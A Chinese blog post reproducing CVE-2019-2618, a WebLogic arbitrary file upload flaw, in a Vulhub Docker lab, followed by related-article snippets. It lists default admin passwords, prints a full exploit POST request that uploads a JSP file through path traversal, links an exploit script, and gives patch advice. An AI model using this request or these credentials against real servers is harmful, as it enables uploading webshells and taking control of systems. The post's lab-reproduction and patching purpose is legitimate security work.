weblogic 文件打开数_WebLogic任意文件上传漏洞(CVE20192618)复现

最新推荐文章于 2024-06-04 09:55:42 发布
最新推荐文章于 2024-06-04 09:55:42 发布
阅读量263 收藏
点赞数
文章标签: weblogic 文件打开数 weblogic 默认密码 weblogic安装 weblogic漏洞 weblogic点击服务器反应慢 weblogic遇到无法识别的补丁程序

1.漏洞介绍

CVE-2019-2618漏洞主要是利用了WebLogic组件中的DeploymentService接口,该接口支持向服务器上传任意文件。攻击者突破了OAM(Oracle Access Management)认证,设置wl_request_type参数为app_upload,构造文件上传格式的POST请求包,上传jsp木马文件,进而可以获得整个服务器的权限。

2.影响版本

WebLogic 10.3.6.0、12.1.3.0、12.2.1.3

3.漏洞复现

3.1漏洞环境

使用Vulhub里面的CVE-2017-10271环境作为漏洞环境

root@kali:~/vulhub/weblogic/CVE-2017-10271# ls
1.png  docker-compose.yml  README.md  set_mirror.sh

root@kali:~/vulhub/weblogic/CVE-2017-10271# docker-compose up -d

访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动

bd87b6d876ae7bab0fdddf142a67ea06.png

3.2漏洞利用

需要获取weblogic的登陆权限

可尝试以下默认口令

weblogic/weblogic

weblogic/Oracle@123

POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1Host: 192.168.64.161:7001Connection: closeAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.21.0username: weblogicwl_request_type: app_uploadcache-control: no-cachewl_upload_application_name: /../tmp/_WL_internal/bea_wls_internal/9j4dqk/warserverName: testpassword: Oracle@123content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gWarchive: trueserver_version: 10.3.6.0wl_upload_delta: trueContent-Length: 1081------WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data; name="img"; filename="test.jsp"Content-Type: false        out.print("123456");%>------WebKitFormBoundary7MA4YWxkTrZu0gW--

abade96ce3cae26b21d155da1a60783d.png

4.修复建议

1、加强密码口令

2、Oracle官方已经在关键补丁更新(CPU)中修复了该漏洞

链接:

https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html

5.工具利用

大佬脚本

https://github.com/jas502n/cve-2019-2618

7349b7de60c811d97c14f3b4d51b7719.gif

weixin_39940344
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WebLogic 任意文件CVE-2019-2618)漏洞
橘子女侠
07-24 6996
WebLogic任意文件CVE-2019-2618)漏洞 一、漏洞概述 1、漏洞编号:CVE-2019-2618 2、漏洞描述:CVE-2019-2618漏洞主要是利用了WebLogic组件中的DeploymentService接口,该接口支持向服务器上任意文件。攻击者突破了OAM(Oracle Access Management)认证,设置wl_request_type参数为a...
weblogic漏洞利用工具_CVE20192618Weblogic weak password+文件漏洞
weixin_39571087的博客
12-12 1916
一、漏洞介绍0x01 weblogic常见弱口令system/passwordweblogic/weblogicadmin/securityjoe/passwordmary/passwordsystem/securitywlcsystem/wlcsystemwlpisystem/wlpisystemweblogic/Oracle@1230x02 漏洞介绍 CVE-2019...
探索WebLogic安全之钥:CVE-2019-2618深度解析与实践
最新发布
gitblog_00097的博客
06-04 372
探索WebLogic安全之钥:CVE-2019-2618深度解析与实践 项目地址:https://gitcode.com/jas502n/cve-2019-2618 在信息安全的前沿阵地,每一个漏洞的发都是对网络安全的一次警醒。今天,我们将深入探索一个影响深远的Oracle WebLogic Server漏洞——CVE-2019-2618。这个漏洞不仅考验着管理员的安全防护意识,也为安全研究者提...
WebLogic T3 反序列化 0day 漏洞
sqlora的专栏
04-19 1350
关闭 T3 协议或限制访问地址。 1、检查是否开启T3协议:查找应用服务器路径是否存在 /bea_wls_deployment_internal/loginUser.do (返回状态码是 200 为已开启) 2、关闭和限制方式:在连接筛选器中输入: weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则中 输入: ip**allowt3 (允许通过T3协议访问的地址) 0.0.0.0/0 * deny t3 t3s (限制...
《WEB安全漏洞30讲》(第5讲)任意文件漏洞
午夜安全
05-22 3335
文件漏洞,指攻击者利用程序缺陷绕过系统对文件的验证与处理策略将恶意程序上到服务器并获得执行服务器端命令的能力。这个漏洞其实非常简单,就是攻击者给服务器上了恶意的木马程序,然后利用此木马程序执行操作系统命令,从而获得服务器权限,造成严重的安全隐患。比如一个JAVA系统本来需要上身份证图片进行用户实名认证,结果恶意用户上了jsp木马文件,之后利用这个文件执行系统命令,再以这个系统为据点,对内网其他互通的系统进行攻击,这样将导致整个内网系统的沦陷。
weblogic10.36 CVE-2018-2893补丁文件
08-02
weblogic10.36 CVE-2018-2893补丁文件 最新补丁文件,修 WebLogicCVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞...
WebLogic反序列化_CVE-2017-3248
09-06
WebLogic反序列化_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C <arg> (执行命令)Execute ...
文件漏洞
热门推荐
weixin_59872639的博客
02-22 1万+
文件 文件代互联网常见的功能,允许用户上图片、视频、及其他类型文件,向用户提供的功能越多,Web受攻击的风险就越大。 文件漏洞文件时,如果未对上文件进行严格的验证和过滤,就容易造成文件漏洞,上脚本文件(包括asp、aspx、php、jsp等) 恶意上行为可能导致网站甚至整个服务器被控制。恶意的脚本文件又被称为WebShell,WebShell具有强大的功能,如查看服务器目录、服务器中文件、执行系统命令等。 文件漏洞成因 文件漏洞的成因(杂),一方
网络安全进阶学习第五课——文件漏洞
p36273的博客
07-03 4601
黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。getimagesize()函数会读取目标文件的16进制,验证目标文件16进制的头几个字符串是否符合图片的要求,通过此函数判断文件类型。通常在一个请求中,同样名称的参数只会出一次,函数包含的文件都会被当作PHP代码执行,无论文件的名称是什么,只要符合文件内容符合PHP代码规范,都会被当作PHP代码执行。
任意文件漏洞
gaomei2009的专栏
08-24 2318
任意文件漏洞
任意文件漏洞原理及上利用案例(任意文件漏洞怎么解决)
白帽黑客八哥的博客
12-18 1633
任意文件漏洞是一种Web应用程序中常见的安全漏洞,攻击者通过该漏洞可以上恶意文件到服务器上。这可能导致多种安全问题,包括远程代码执行、服务器拒绝服务等。通常,攻击者通过构造特定的文件请求,绕过应用程序的文件类型验证和访问控制,成功上具有恶意代码的文件
任意文件漏洞详解与防护
鑫和皓的博客
08-10 1841
任意文件漏洞是一种常见的网络安全问题,它允许攻击者上并执行恶意文件,从而获取或破坏系统数据。上恶意脚本:攻击者可以上包含恶意代码的脚本文件,如PHP、ASP、JSP等,然后通过浏览器访问这些文件,执行恶意代码。上恶意二进制文件:攻击者可以上包含恶意代码的二进制文件,如DLL、EXE等,然后利用其他漏洞或手段执行这些文件。严格检查上文件:对上文件的类型、大小、名字和内容进行严格的检查,只接受符合要求的文件。使用安全编程技术:在编写文件功能时,使用安全编程技术,如预备语句、输入验证等。
任意文件漏洞(简介)
diaobusi的博客
08-22 654
文件是指将文件从本地计算机或其他设备上到网络服务器或其他存储位置的过程。通过文件,您可以将文件(如图像、文档、音频或视频等)输到网络上的不同位置,以实文件共享、备份、存储或与他人共享内容等目的。用户选择要上文件:用户在自己的设备上选择要上文件,可能通过文件资源管理器、拖放文件或选择文件对话框等方式进行。文件输至服务器:一旦用户选择文件,通过网络将文件发送到特定的服务器。可以使用各种协议,如HTTP、FTP、SFTP等来实文件输。
【WEB漏洞原理】任意文件漏洞
过期的秋刀鱼
08-29 1906
文件是web应用必备功能之一,如:头像上,附件分享登,如果服务器配置不当或者 没有进行足够的过滤,Web用户就可以上任意文件,包括恶意脚本文件,exe 程序等等,这就造成了任意文件漏洞
WebLogic任意文件漏洞CVE-2019-2618)
晚风不及你
09-11 3435
事件描述 WebLogic组件介绍 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 漏洞分析 CVE-2019-2618漏洞主要是利用了WebLogic组件中的DeploymentService接口,该接口支持向服务器上任意文件。攻击者突破了OAM(Oracle Access Management)认证,设置wl_r
Weblogic RCE漏洞CVE-2020-14882&14883:与影响版本解析
近期,两个关键性漏洞 CVE-2020-14882 和 CVE-2020-14883 被发,这些漏洞的存在使得未经授权的远程攻击者能够通过精心构造的GET请求,在受影响的Weblogic Server上执行任意代码。这两个漏洞影响了多个版本,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值